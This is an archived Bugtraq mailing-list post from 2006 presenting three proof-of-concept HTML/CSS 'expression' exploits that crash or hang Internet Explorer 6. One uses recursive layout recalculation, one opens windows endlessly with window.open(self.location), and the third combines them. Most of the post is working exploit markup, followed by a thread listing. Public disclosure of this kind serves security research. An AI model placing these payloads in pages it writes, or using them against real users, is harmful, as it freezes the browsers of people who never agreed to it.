Bugtraq mailing list archives
Re: Internet Explorer 6 CSS "expression" Denial of Service Exploit (P.o.C.)
From: José Carlos Nieto Jarquín <xiam.core () gmail com>
Date: Wed, 06 Dec 2006 01:01:10 -0600
Note: I'm sorry, two of the the exploits in the prior e-mail were incomplete.This is just another couple of proof of concept exploits for this well-known browser. The third one is a lame combination of both.
Tested under Windows XP SP2, MSIE 6.0.2900.2180 Exploit 1 <div id="foo" style="height: 20px; border: 1px solid blue"><table style="border: 1px solid red; width: expression(document.getElementById('foo').offsetWidth+'px');">
<tr><td></td></tr> </table> </div> Exploit 2 <div style="width: expression(window.open(self.location));"> </div> Exploit 3 <html> <head> <title>Another non-standards compliant IE D.O.S.</title> </head> <body> <div id="foo" style="height: 20px; border: 1px solid blue"><table style="border: 1px solid red; width: expression(parseInt(window.open(self.location))+document.getElementById('foo').offsetWidth+'px');">
<tr> <td> IE makes my life harder :(. It sucks, don't use it :). </td> </tr> </table> </div> Written by <a href="http://xiam.be">xiam</a>.<br /> Tested under IE 6.0.2900.2180 </body> </html> -- La civilizaci~n no suprime la barbarie, la perfecciona. - Voltaire - J. Carlos Nieto (xiam). http://xiam.be
Current thread:
- Re: Internet Explorer 6 CSS "expression" Denial of Service Exploit (P.o.C.) José Carlos Nieto Jarquín (Dec 06)
- Re: Internet Explorer 6 CSS "expression" Denial of Service Exploit (P.o.C.) Andrius Paurys (Dec 07)
- Re: Internet Explorer 6 CSS "expression" Denial of Service Exploit (P.o.C.) chinese soup (Dec 08)
- Re: Internet Explorer 6 CSS "expression" Denial of Service Exploit (P.o.C.) chinese soup (Dec 12)
- Re: Internet Explorer 6 CSS "expression" Denial of Service Exploit (P.o.C.) chinese soup (Dec 08)
- Re: Internet Explorer 6 CSS "expression" Denial of Service Exploit (P.o.C.) Andrius Paurys (Dec 07)